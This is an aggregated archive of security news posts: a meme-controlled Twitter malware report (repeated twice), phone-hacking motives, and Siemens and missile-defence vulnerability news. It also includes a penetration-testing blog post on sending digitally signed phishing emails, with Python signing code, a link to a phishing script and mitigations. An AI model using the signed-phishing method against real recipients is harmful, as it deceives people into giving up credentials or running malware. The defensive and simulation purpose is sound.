Category Archives: Hacking

Security Affairs: Malware controlled through commands hidden in memes posted on Twitter

New Malware Takes Commands From Memes Posted On Twitter

Security researchers at Trend Micro have spotted a new strain of malware that retrieved commands from memes posted on a Twitter account controlled by the attackers. In this way, attackers make it hard to detect traffic associated with the malware that is this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty, it the past crooks used legitimate services like Gmail, DropBox, PasteBin, and also Twitter to control malicious codes.

The malware discovered by Trend Micro leverages on the steganography to hide the commands embedded in a meme posted on Twitter. 

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes, it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

twitter memes malware

Below the list of commands supported by the malware:

CommandsDescription
/printScreen capture
/processosRetrieve list of running processes
/clipCapture clipboard content
/usernameRetrieve username from infected machine
/docsRetrieve filenames from a predefined path such as (desktop, %AppData% etc.)

According to Trend Micro, the malware is in the early stages of its development, experts noticed that the Pastebin link points to a local, 

Pierluigi Paganini

(SecurityAffairs –malware, memes)

The post Malware controlled through commands hidden in memes posted on Twitter appeared first on Security Affairs.



Security Affairs

Malware controlled through commands hidden in memes posted on Twitter

New Malware Takes Commands From Memes Posted On Twitter

Security researchers at Trend Micro have spotted a new strain of malware that retrieved commands from memes posted on a Twitter account controlled by the attackers. In this way, attackers make it hard to detect traffic associated with the malware that is this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty, it the past crooks used legitimate services like Gmail, DropBox, PasteBin, and also Twitter to control malicious codes.

The malware discovered by Trend Micro leverages on the steganography to hide the commands embedded in a meme posted on Twitter. 

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes, it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

twitter memes malware

Below the list of commands supported by the malware:

CommandsDescription
/printScreen capture
/processosRetrieve list of running processes
/clipCapture clipboard content
/usernameRetrieve username from infected machine
/docsRetrieve filenames from a predefined path such as (desktop, %AppData% etc.)

According to Trend Micro, the malware is in the early stages of its development, experts noticed that the Pastebin link points to a local, 

Pierluigi Paganini

(SecurityAffairs –malware, memes)

The post Malware controlled through commands hidden in memes posted on Twitter appeared first on Security Affairs.

All the reasons why cybercriminals want to hack your phone

When people think of hacking, most imagine desktop computers, laptops, or perhaps even security cameras. However, in recent years, cybercriminals have expanded their repertoire to include smartphones, too. Here are 10 reasons why they may be looking to hack your phone.

1. To infect it with malware

Many smartphone users assume they can stay safe from malware and other threats by installing antivirus apps on their phones and being extra careful about the websites they visit. They typically don’t expect their phones to have malware out of the box. However, researchers showed that’s what happened with more than three dozen Android models, typically from lesser-known brands.

The phones had Trojan malware installed on them before they reached users, and the culprit appeared to be a software vendor in Shanghai that was a shared reseller for a brand of antivirus software. Although it’s not clear what the hackers wanted to do after infecting the phones, the malware was particularly hard to remove. Often, it involved fully reinstalling the operating system.

2. To eavesdrop on calls

People use their phones to speak to loved ones, discuss business plans, talk about their travels—all manner of personal, intimate content. So, it’s not surprising that criminals would want to break in and listen, whether to case a target or simply for voyeuristic pleasure. But how do they do it?

There’s a flaw in US cellular exchange, the vulnerability known as SS7, which allows hackers to listen to calls, read texts, and see users’ locations after learning their phone numbers. Even though US agencies know about the issue, they haven’t taken decisive action to fix it, leaving Americans’ phone privacy at risk.

3. To steal money

Ransomware attacks cause headaches for computer users by making the affected machines lock up or holding files hostage until people pay the ransom to restore access. Even then, paying doesn’t guarantee a return to proper functionality. Ransomware doesn’t only affect computers, though. There’s a recent trend of mobile ransomware, which often originates from malicious, third-party apps.

In one example, a third-party app promised to optimize the Android system but actually tricked people into transferring $1,000 from their PayPal accounts. The login process was legitimate, so it wasn’t a phishing attempt. However, once people logged in, a Trojan automated the PayPal transfer.

4. To blackmail people

The crime of blackmail isn’t new, but threat actors recognize that the small computer in people’s pockets and purses likely has more personal information stored in it than a desktop or laptop. And they are able to first cut people off from accessing their phones before then threatening to leak the information they find.

Criminals may start the hack after obtaining some personal information from a victim that available on the black market due to a previous, unrelated breach. They then use that information to contact the victim’s phone company and pose as the user, saying that they want to transfer the number to a new phone. Phone companies often provide such services and can automatically transfer information, including phone numbers, to a new device. The trouble is that in this case, the old phone still works but it’s useless to the person who owns it.

After hackers take over a phone in this way, the stage is set for more serious crimes—blackmail among them. If a person had essential numbers in their phone not backed up elsewhere, they could easily feel pressured to cave into hackers’ demands to avoid worse consequences.

5. To damage your phone

Hackers feel they’ve accomplished a goal by causing chaos for victims. One way to do that is to make the phone overheat and ultimately ruin it. Security researchers warned that hackers could break into a phone’s processor and use it for mining cryptocurrency. In addition to making the phone slow down, it can also cause the phone to get too hot or even blow up!

There are many reliable cooling devices used in cell phones for temperature management, even “intelligent” temperature management solutions that heat up your phone’s battery when it’s too cool and cool it down when it’s too hot. However, if hackers have their way, even those normally sufficient internal components could fail to keep the device cool enough.

One type of the cryptomining malware called Loapi is often hidden in apps that appear as downloadable games. Security researchers ran a test and found it actually made a phone battery bulge due to excessive heat after only two days.

6. To threaten national security

Countless analysts have chimed in to say that President Trump’s alleged use of insecure mobile devices could help foreign adversaries glean information about the United States that could threaten the nation or at least give information about the president’s intended actions.

In 2018, Billy Long, a Republican congressman, had his mobile phone and Twitter account hacked. Cybercriminals know that one of the primary ways politicians interact with followers is through social media.

Besides threatening national security more directly, these hackers could erode the trust politicians have built with their audiences, especially with fake posts that seem to come from the genuine account owners.

Cybercriminals know that by hacking the mobile phones and social media accounts of politicians, they are contributing to the overall public opinion that politicians cannot be trusted. Instead of looking to the source for information, users might instead look for news via sources that are even less reliable or strategically crafted to spread fake news.

7. For fun or notoriety

Some hackers get a thrill by successfully pulling off their attacks. Hacking is a source of entertainment for them, as well as an ego boost. If money isn’t the primary motivator for cybercriminals, then notoriety is might be a close second. Hackers may get into phones because it’s a newer challenge that might require more cutting-edge malware development techniques. Ultimately, many cybercriminals want approval from others in the industry and desire their respect.

8. To get payment information

E-wallets, which store payment information inside smartphone apps so people don’t have to carry real credit or debit cards, are convenient. However, their rising popularity has given hackers another reason to target phones.

Often, cybercriminals entice people to download fake mobile payment apps (of course believing they are real). Then, once people enter their payment information, hackers have the information needed to charge transactions to the cards.

9. Because so many people use it

Since hackers want their attacks to have significant payoffs, they know they can up their chances of having a major impact by targeting smartphones. Information published by the Pew Research Center shows 95 percent of Americans own smartphones. To put that in perspective, only 35 percent of the population did in 2011, when the organization first conducted a survey on smartphone ownership.

Also, different research from another organization reveals that mobile Internet usage is overtaking desktop time. People are becoming increasingly comfortable with using their smartphones to go online, browse, and even shop. As such, no matter what kind of hack cybercriminals orchestrate, they can find plenty of victims by focusing on smartphone users.

10. Because it’s an easy target

Research shows that mobile apps have rampant security problems. This gives criminals ample opportunity to infiltrate insecure apps rather than the phones themselves.

In one case, about 40 of the top 50 shopping apps had at least a few high-level security vulnerabilities that allowed hackers to see personal information or deceive users by luring them to dangerous apps that were copies of the originals.

Further research about problematic dating apps found that many of them give third parties access to unencrypted data through vulnerable software development kits (SDKs). Hackers know some apps achieve hundreds of thousands, or even millions. of downloads. If they can break into them, they’ll get fast access to the phones that have those apps installed and the people who use them.

How to stay protected

These examples show that hackers have a myriad of reasons to hack phones and even more ways to make it happen. One easy way to protect against attacks is to avoid third-party app stores and only download content from the phone’s legitimate app stores, such as Google Play or iTunes. However, threat actors can penetrate those platforms, too, and many an infected or rogue app has made its way through.

It’s also smart to keep tabs on phone statistics, such as battery life and the number of running apps. If those deviate too much from the norm, that’s a sign hackers may be up to no good in the background.

Running a mobile antivirus scan at least monthly, or installing an always-on cybersecurity program is another good strategy, but only if the application comes from a trustworthy source, such as the vendor’s official site.

Instead of being overeager to download new apps, people should ideally exercise caution and only do so if numerous sources of feedback indicate they are free from major security flaws. Some app development companies are in such a hurry to get to the market with their latest offerings that they do not make security a priority.

Besides these more specific tips, it’s essential for people to be highly aware of how they interact with their phones. For example, strange pop-ups or redirects in a phone’s browser, or random icons appearing without having downloaded a new app could indicate problems, and individuals should not assume that everything’s okay. When in doubt, it’s best to stop using the phone and get some answers—before hackers learn all they need to know about you.

The post All the reasons why cybercriminals want to hack your phone appeared first on Malwarebytes Labs.

Hacker found using Twitter memes to spread malware

By Waqas

Last year a shocking report revealed how Russian hackers were found spreading malware through Britney Spears’s Instagram posts. Now, the IT security researchers at Trend Micro have discovered a sophisticated campaign in which an unknown hacker is using memes on the social networking service Twitter, to spread malware. According to Trend Micro’s report released on Monday […]

This is a post from HackRead.com Read the original post: Hacker found using Twitter memes to spread malware

Radware Blog: Top 6 Threat Discoveries of 2018

Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors. DemonBot Radware’s Threat Research Center has been monitoring and tracking a malicious agent […]

The post Top 6 Threat Discoveries of 2018 appeared first on Radware Blog.



Radware Blog

Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario which looks credible enough to persuade the target to perform a certain action like opening an attachment or clicking on a link in the email. To avoid such attacks the IT or security team will tell users to check for certain things to avoid falling for these phishing emails. One of the recommendations is to check if the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks; so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same; we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…
To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia https://en.wikipedia.org/wiki/Email_spoofing

This means that an email originating from the domain “ fox-it.com ”, may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain “ fox-it.com ” was not sent by the email server specified in the SPF record, the email message can be flagged as SPAM. By using SPF records you know that the email was sent by an authorized email server, SPF records however, do not disclose the authenticity of the sender. If a company has configured their SMTP server as an open relay server, users can send mail on another user’s behalf which will pass the SPF record check on the receivers end. There are other measures that can be used to identify legitimate mail servers to reduce phishing attacks, such as DKIM and DMARC, however, these are beyond the scope of this blogpost.

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.
For now we’ll focus on the aspect of validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (i.e.: “john.doe@fox-it.com “). The client will check if this matches the originating email-address. To verify the authenticity of the digital signature, the email client will also check if the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed using a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.

6oQvhoK

By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (i.e.: “john@fox-it.com “) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.
Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.

OxmuNkt

Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true, if alice@fox-it.com sends you a signed email with a valid certificate: the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But, if alice@fox-it.cm (notice the ‘.cm’ instead of ‘.com’) sends you a signed email with a valid certificate, that person can still be anyone. As long as that person has control over the domain ‘fox-it.cm’, they will be able to send signed emails from that domain. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard if they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our client’s employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we setup a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:

8A9oUnj

This is not limited to Office Outlook only, it is working in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn’t have a red rosette to show the user that an email is digitally signed, there are some indicators which are present when reading a signed email. As you can see below, the digital signature does still add to the legitimate look of the phishing emails:

5floNBj

Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail. Since the Dutch government has a webpage1 with information about the use of electronic signatures in email, we can write a paragraph that looks something like the the one in the image below.

gov

Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from M2Crypto library
from M2Crypto import bio, rand, smime

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG.
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; set it up; sign the buffer.
s = SMIME.SMIME()
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format.
out = BIO.MemoryBuffer()
out.write('From: %s\n' % sender)
out.write('To: %s\n' % target)
out.write('Subject: %s\n' % subject)

s.write(out, p7, buf)
msg = out.read()

# Save the PRNG's state.
Rand.save_file('randpool.dat')

This code originates from the Python M2Crypto documentation2

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick google query for “free email certificate” should give you enough results to start requesting your own certificate. If you have access to an inbox you’re good to go.
To get an idea of how the above code snippet can be included in a standalone script, we’d like to refer to Fox-IT’s Github page where we’ve uploaded an example script which takes the most basic email parameters (‘from’, ‘to’, ‘subject’ and ‘body’). Don’t forget to place the required certificate and corresponding key file in the same directory with the Python script if you start playing around with the example script. Link to project on GitHub: https://github.com/fox-it/signed-phishing-email

Mitigation

There are some mitigations that can make this type of attack harder to perform for an attacker. We’d like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name that is similar to your own domain name can trick users into executing malware or giving away their credentials more easily. This type of attack is called domain squatting, which can result in examples like fox-it.cm instead of fox-it.com . There are generators that can help you with that, such as: https://github.com/elceef/dnstwist

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server in an organisation for maintaining integrity and secrecy. All non-public certificates will stem from this server. Most organizations choose to completely isolate their root CA for that reason and use another server, the subordinate CA, to sign certificate requests; The subordinate CA will sign certificates on behalf of the root CA.
In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU from all certification authorities, except from our own root and subordinate CA, phishing mail that is signed with a valid certificate signed by a third party CA, will still trigger a warning stating that the certificate is invalid.
To do that, we must first discover all certificates that support the secure email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email
Get-ChildItem -Path 'Cert:\' -Recurse | Where-Object {$_.GetType().Name -eq 'X509Certificate2' -and ({$_.EnhancedKeyUsageList.Count -eq 0} -or $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')} | Select-Object PSParentPath, Subject

We now know which certificates support the secure email EKU. In order to disable to secure email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, select Certificates
    B8TQT4f
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificates stores must be edited.
    CpRQtRz

    1. Check if intended purpose states Secure email or All
      175MRhH
  4. Open the properties of a certificate and click the details tab

If the intended purpose at step 3.1 stated All,
1. Click Key Usage, followed by Edit Properties.
iFPwV2x
2. Click Enable only the following purposes and uncheck the Secure Email checkbox
8nhvj29

If the intended purpose at step 3a stated Secure Email,
1. Click Enhanded key usage (property)
EHH4vBz
2. Click Edit Properties…
3. Uncheck the Secure Email checkbox
8nhvj29

Please keep the following in mind when implementing these mitigations:
* When a legitimate mail has been signed with with a certificate issues by a CA that of which the Secure Email EKU has been removed, the certificate of the email will not be trusted by Windows
* Changing the EKU may have an impact on the working of your systems
* These settings can be reverted with every update in Windows
* New or renewed certificates can have the Secure email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post it becomes more and more obvious that users will never be able to withstand social engineering attacks. In a best case scenario, users will detect and report an attack, in a worst case scenario your users will become victim. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always become a victim. This means that we (organizations) need to start thinking about new and more user friendly strategies in combating these type of attacks.

To summerize this blogpost:
* An email coming from a domain does not prove the integrity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* If the domain of the sender address is correct and the email has been signed with a valid certificate signed by a trusted CA, only then the email can be trusted.

References

1: https://www.rijksoverheid.nl/onderwerpen/digitale-overheid/vraag-en-antwoord/wat-is-een-elektronische-handtekening (Dutch)
2: https://m2crypto.readthedocs.io/en/latest/howto.smime.html#m2crypto-smime “M2Crypto S/MIME”

Twitter uncovered a possible nation-state attack

Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Experts at Twitter discovered a possible state-sponsored attack while they were investigating an information disclosure vulnerability affecting its support forms. The experts discovered that the attack was launched from IP addresses that may be linked to nation-state actors.

The flaw affected a support form that could be used to contact Twitter in case of problems with an account. The flaw could have been exploited to obtain the country code of a user’s phone number and determine whether or not the account had been locked by Twitter.

An account could be locked if it violates rules or terms of service, or if the account was compromised. The social media platform fixed the flaw on November 15, in just 24 hours.

The experts noticed a suspicious activity related to the API associated with the flawed customer support form.

“During our investigation, we noticed some unusual activity involving the affected customer support form API.” reads a blog post published by Twitter.

“Specifically, we observed a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia. While we cannot confirm intent or attribution for certain, it is possible that some of these IP addresses may have ties to state-sponsored actors. We continue to err on the side of full transparency in this area and have updated law enforcement on our findings.”

Twitter

Twitter, like many other social media platforms, are a privileged target for state-sponsored hackers that could use them for online propaganda and spread fake news.

In November, the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party. The expert was awarded $2,940 for reporting the bug to the company under the bug bounty program operated through the HackerOne platform.

Pierluigi Paganini

(SecurityAffairs – intelligence,hacking)

The post Twitter uncovered a possible nation-state attack appeared first on Security Affairs.

Pro-PewDiePie messages appear on hacked Wall Street Journal website

By Waqas

The official website of the Wall Street Journal was hacked earlier today after unknown hackers defaced it with messages in support of PewDiePie (Felix Kjellberg), the most widely followed YouTuber. The hackers left a deface page along with a message on the domain (partners.wsj.com) that WSJ uses to publish content paid for by advertisers. The deface […]

This is a post from HackRead.com Read the original post: Pro-PewDiePie messages appear on hacked Wall Street Journal website

Chinese hackers reportedly stole secret US Navy data

By Waqas

Hackers of Chinese origin have stolen data from US Navy contractors whose content includes highly confidential information on advanced military technologies. In June this year, it was reported that Chinese hackers stole 614 gigabytes of US Navy’s anti-ship missile data. Now, authorities in the United States have once again accused Chinese hackers of stealing secret data belonging […]

This is a post from HackRead.com Read the original post: Chinese hackers reportedly stole secret US Navy data

Germany’ BSI chief says ‘No Evidence’ of Huawei spying


The head of Germany’s BSI admitted that since now there is no proof espionage activity conducted through Huawei technology.

US first, and many other countries after, have decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government is urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan.  Currently main mobile network operators in Germany use Huawei technology for their infrastructure.

Now Germany’s IT watchdog has expressed its opinion about the ban of the Huawei technology, it has highlighted that there is no evidence that the equipment could be used by Chinese intelligence in cyber espionage activity.

On Friday, the head of Germany’s Federal Office for Information Security (BSI), Arne Schoenbohm admitted that since now there is no proof espionage activity conducted through Huawei technology.

“For such serious decisions like a ban, you need proof,” Arne Schoenbohm, told news weekly Spiegel, confirming that the BSI had no such evidence.

Huawei was already excluded by several countries from building their 5G internet networks. The United StatesAustralia, New Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Schoenbohm explained that BSI experts assessed the Huawei products from around the world and hasn’t found suspicious components or backdoors.
BSI experts also visited a recently opened Huawei Security Innovation Lab in Bonn, a center that will work closely with German customers, partners, research institutions as well as government and supervisory authorities.

Commenting on the opening of the laboratory, BSI President Arne Schönbohm said: “We welcome the opening of this laboratory, which will allow further and deeper technical exchange between Huawei and BSI to address the future challenges of cyber security”.

BSI huawei

Many security experts continue to express their concerns about Huawei products.

“I believe it’s wrong to suggest that the concerns about Chinese espionage are unfounded and easy to detect,” telecom security expert Ronja Kniep told AFP.

“Even if Huawei has no official relationship with the Chinese government, that doesn’t mean Chinese services aren’t using the company and its technology as vehicles for espionage.”

Pierluigi Paganini

(SecurityAffairs –BSI, Huawei)



The post Germany’ BSI chief says ‘No Evidence’ of Huawei spying appeared first on Security Affairs.

Siemens addresses multiple critical flaws in SINUMERIK Controllers

Siemens addressed several vulnerabilities in SINUMERIK controllers, including denial-of-service (DoS), privilege escalation and code execution issues.

Siemens has fixed several flaws in SINUMERIK controllers, some of them have been classified as “critical.” The list of vulnerabilities includes DoS, 
privilege escalation and code execution flaws.

Security experts at Kaspersky Lab discovered that SINUMERIK 808D, 828D and 840D controllers are affected by multiple vulnerabilities.

“The latest updates for SINUMERIK controllers fix multiple security vulnerabilities that could allow an attacker to cause Denial-of-Service conditions, escalate privileges, or to execute code from remote.” reads the security advisory published by Siemens.

“Siemens has released updates for several affected products, is working on updates for the remaining affected products and recommends specific countermeasures until fixes are available. Siemens recommends to update affected devices as soon as possible.”

Siemens SINUMERIK Controllers

The most serious flaw, tracked as CVE-2018-11466 and ranked with
CVSS score of 10, could be exploited by an unauthenticated attacker on the network to trigger a DoS condition on the integrated software firewall or execute arbitrary code in the context of the firewall by sending specially crafted packets to TCP port 102.

“Specially crafted network packets sent to port 102/tcp (ISO-TSAP) could allow a remote attacker to either cause a Denial-of-Service condition of the integrated software firewall or allow to execute code in the context of the software firewall.” continues the advisory.

“The security vulnerability could be exploited by an attacker with network access to the affected systems on port 102/tcp. Successful exploitation requires no user privileges and no user interaction. The vulnerability could allow an attacker to compromise confidentiality, integrity and availability of the system.”

Siemens also fixed the CVE-2018-11457 in the integrated web server, the flaw can be exploited by a network attacker with access to TCP port 4842 to execute code with elevated privileges by sending specially crafted packets.

“The security vulnerability could be exploited by an attacker with network access to the affected devices on port 4842/tcp. Successful exploitation requires no privileges and no user interaction. The vulnerability could allow an attacker to compromise confidentiality, integrity and availability of the webserver.” continues the advisory.

Another critical flaw tracked as CVE-2018-11462 could be exploited to elevate privileges, except to root.

The last critical vulnerability, tracked as CVE-2018-11458, affects the integrated VNC server, it could be exploited to execute arbitrary code with elevated privileges via specially crafted network packets on port 5900. 

Siemens also fixed three high-severity flaws that allow local code execution, and three medium-severity privilege escalation and DoS bugs.

The good news is that Siemens is not aware of attacks exploiting the above flaws. 

Pierluigi Paganini

(Security Affairs – Siemens, Sinumerik)

The post Siemens addresses multiple critical flaws in SINUMERIK Controllers appeared first on Security Affairs.

PewDiePie fan hacker compromise 100,000 printers

By Waqas

A couple of weeks ago, a hacker going by the online handle of TheHackerGiraffe hacked over 50,000 printers for the sake of promoting PewDiePie’s YouTube channel and urging users to subscribe to his channel. Now, the same hacker has struck again and claims to have hacked over 100,000 printers globally. This time with the help of another […]

This is a post from HackRead.com Read the original post: PewDiePie fan hacker compromise 100,000 printers

Wicked scammers steal $1 million from Save the Children charity

By Uzair Amir

Another day, another email scam – This time, wicked scammers have stolen over $1,000,000 from Save the Children, an international non-governmental organization based in London, United Kingdom. This happened after scammers compromised email address of one of the Save the Children employees and generated fake invoices and other documents to trick the charity organization into sending 1 million […]

This is a post from HackRead.com Read the original post: Wicked scammers steal $1 million from Save the Children charity

US ballistic missile defense systems (BMDS) open to cyber attacks

U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit

US DoD Inspector General’s report revealed United States’ ballistic missile defense systems (BMDS) fail to implements cyber security requirements.

The U.S. Department of Defense Inspector General published a report this week that revealed that lack of adequate cybersecurity for the protection of the United States’ ballistic missile defense systems (BMDS).

Ballistic missile defense systems are crucial components of the US Defense infrastructure, they aim to protect the country from short, medium, intermediate and long-range ballistic missiles.

BMDS United States ballistic missile defense systems BMDS

Experts warn of cyber attacks against these systems launched by nation-state actors.

Back on March 14, 2014, the DoD Chief Information Officer announced the DoD plans of implementing the National Institute of Standards and Technology (NIST) security controls to improve cybersecurity of systems.

More than four years later the situation is worrisome, according to a new DoD report the BMDS facilities have failed to implement security controls requested by the standard.

“We determined whether DoD Components implemented security controls and processes at DoD facilities to protect ballistic missile defense system (BMDS) technical information on classified networks from insider and external cyber threats.” reads the DoD report.

“We analyzed only classified networks because BMDStechnical information was not managed on unclassifiednetworks. The classified networks processed, stored, andtransmitted both classified and unclassified BMDStechnical information.”

The report states the BMDS did not implement security controls such as multifactor authentication, vulnerability assessment and mitigation, server rack security, protection of classified data stored on removable media, encrypting transmitted technical information, physical facility security such as cameras and sensors. Operators at BMDS facilities did not perform routine assessments to verify the level of cybersecurity implemented.

We determined that officials from … the did not consistently implement security controls and processes to protect BMDS technical information.” continues the report.

In a BMDS facility, users used single-factor authentication for up to 14 days during account creation, in another facility users were allowed to access a system that does not even support multifactor authentication.

The report also shows the failure in patch management for systems in many facilities. For some facilities, there were found vulnerabilities that had not been patched since their discovery in 2013.

“Although the vulnerability was initially identified in 2013, the still had not mitigated the vulnerability by our review in April 2018. Of the unmitigated vulnerabilities, the included only in a POA&M and could not provide an explanation for not including the remaining vulnerabilities in its POA&M” continues the report.

According to the report, facilities were also failing in encrypting data that was being stored on removable devices, they also failed in using systems that kept track of what data was being copied. 

